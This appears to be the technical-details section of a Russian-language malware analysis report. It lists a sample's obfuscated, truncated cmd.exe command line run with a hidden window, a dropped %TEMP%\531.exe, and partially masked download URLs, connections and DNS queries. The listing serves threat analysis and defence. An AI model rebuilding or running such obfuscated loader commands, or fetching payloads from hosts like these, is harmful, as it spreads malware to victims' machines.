Техническая информация
- '<SYSTEM32>\cmd.exe' /c cMD.ExE /v:/C " Set }`$,=-\/\__-//-/-\__ -\\_-/-\_-_///_ _/_/-\\_\/\--/- -_/\-\_\_-_\/-/ \-_/--\/_\-\//_ /_-_-_\/\_\-\// \\\-/\_-_-/-/_/ __/-\_//\/_\-\- //_\-/_--_/\\-\ /-...
- %TEMP%\531.exe
- %TEMP%\531.exe
- 'fa##usa.com':80
- 'pr##an.com':80
- 'aa###chai.com':443
- 'lu#####moraes.com.br':80
- 'lc#####namento.com.br':80
- http://fa##usa.com/Qmb
- http://pr##an.com/YNH
- http://lu#####moraes.com.br/BtDELY
- http://lc#####namento.com.br/RMd
- 'aa###chai.com':443
- DNS ASK mi###ictor.me
- DNS ASK fa##usa.com
- DNS ASK pr##an.com
- DNS ASK aa###chai.com
- DNS ASK lu#####moraes.com.br
- DNS ASK lc#####namento.com.br
- '<SYSTEM32>\cmd.exe' /c cMD.ExE /v:/C " Set }`$,=-\/\__-//-/-\__ -\\_-/-\_-_///_ _/_/-\\_\/\--/- -_/\-\_\_-_\/-/ \-_/--\/_\-\//_ /_-_-_\/\_\-\// \\\-/\_-_-/-/_/ __/-\_//\/_\-\- //_\-/_--_/\\-\ /-...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /v:/C " Set }`$,=-\/\__-//-/-\__ -\\_-/-\_-_///_ _/_/-\\_\/\--/- -_/\-\_\_-_\/-/ \-_/--\/_\-\//_ /_-_-_\/\_\-\// \\\-/\_-_-/-/_/ __/-\_//\/_\-\- //_\-/_--_/\\-\ /-\\-_-_\_/\-// -/_\-/\__-\-...